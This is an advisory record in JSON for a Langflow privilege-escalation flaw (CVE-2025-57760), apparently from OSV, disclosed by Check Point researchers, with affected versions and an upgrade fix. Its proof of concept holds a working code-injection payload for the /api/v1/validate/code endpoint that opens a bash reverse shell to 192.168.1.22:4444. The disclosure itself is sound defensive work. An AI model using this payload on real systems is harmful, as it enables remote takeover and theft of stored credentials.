{"id":"CVE-2025-57760","aliases":["GHSA-4gv9-mp8m-592r","PYSEC-2026-1526"],"title":"Langflow Vulnerable to Privilege Escalation via CLI Superuser Creation (Post-RCE)","summary":"Langflow Vulnerable to Privilege Escalation via CLI Superuser Creation (Post-RCE)","severity":"high","cvss":8.8,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","vendor":"langflow","product":"langflow","ecosystem":"pip","affected":["langflow < 1.5.1","langflow-base < 0.5.1"],"patched":["langflow 1.5.1","langflow-base 0.5.1"],"published":"2025-08-25","updated":"2026-07-07","source":"OSV","sourceUrl":"https://osv.dev/vulnerability/GHSA-4gv9-mp8m-592r","references":[{"url":"https://github.com/langflow-ai/langflow/security/advisories/GHSA-4gv9-mp8m-592r"},{"url":"https://github.com/langflow-ai/langflow/pull/9152"},{"url":"https://github.com/langflow-ai/langflow/commit/c188ec113c9ca46154ad01d0eded1754cc6bef97"},{"url":"https://github.com/langflow-ai/langflow"}],"tags":["osv","pip"],"epss":0.0048,"epssPercentile":0.40433,"ingestedAt":"2026-07-08T18:25:45.485Z","slug":"CVE-2025-57760","body":"## Overview\n\nThis vulnerability was discovered by researchers at **Check Point**. We are sharing this report as part of a responsible disclosure process and are happy to assist in validation and remediation if needed.\n\n### Summary\nA privilege escalation vulnerability exists in Langflow containers where an authenticated user with RCE access can invoke the internal CLI command **langflow superuser** to create a new administrative user. This results in full superuser access, even if the user initially registered through the UI as a regular (non-admin) account.\n\n### Details\nLangflow's Docker image includes a CLI binary at /app/.venv/bin/langflow that exposes sensitive commands, including:\n\n`langflow superuser`\n\nThis command allows creation of a new superuser without checking whether one already exists. \n\nWhen combined with code execution (e.g., via the authenticated **/api/v1/validate/code** endpoint), a low-privileged user can execute:\n\n`/app/.venv/bin/langflow superuser`\n\ninside the container, and elevate themselves to full superuser privileges.\n\nThis effectively bypasses frontend role enforcement and backend user integrity, leading to full compromise of the Langflow application.\n\n### PoC\n1. Start container with LANGFLOW_ENABLE_AUTH set to True.\n2. Visit http://localhost:7860 and sign up. (Your user will not be marked is_superuser.)\n\n<img width=\"1311\" height=\"627\" alt=\"image\" src=\"https://github.com/user-attachments/assets/9b75bdc3-31ea-48c0-9e84-c2b168f404b3\" />\n\n3. Exploit /api/v1/validate/code to get reverse shell\n\nSend an authenticated POST request:\n\n```\n{\n  \"code\": \"def foo(p=__import__('os').system(\\\"bash -c 'bash -i >& /dev/tcp/192.168.1.22/4444 0>&1'\\\")):\\n    pass\"\n}\n```\n\n4. Inside reverse shell, create superuser:\n\n\n<img width=\"731\" height=\"217\" alt=\"image\" src=\"https://github.com/user-attachments/assets/cb8497c6-0d61-414e-afe2-69bbbaf55cbc\" />\n\n\n5. Log into UI as new superuser:\n\n<img width=\"1262\" height=\"532\" alt=\"image\" src=\"https://github.com/user-attachments/assets/1f0a713d-3d61-4aa4-a25b-58f4b58c061b\" />\n\n\n### Impact\n\n- Privilege escalation to superuser — complete takeover of the Langflow instance\n- Access to all user data, flows, stored credentials, and configuration\n- Credential leakage — attacker can extract third-party API keys \n- Exposure of environment variables (inside docker container)\n- Ability to run additional Langflow instances via `langflow run` inside the container, which may lead to resource exhaustion (CPU, memory) and service degradation.\n- Full user management — superuser can delete other users, reset their passwords\n\n## Affected packages\n\n- `langflow < 1.5.1`\n- `langflow-base < 0.5.1`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `langflow 1.5.1`\n- `langflow-base 0.5.1`","depth":"twilight","depthScore":48,"depthScoreParts":{"impact":48.4,"likelihood":0.1,"exploitation":0,"ransomware":0},"changes":[]}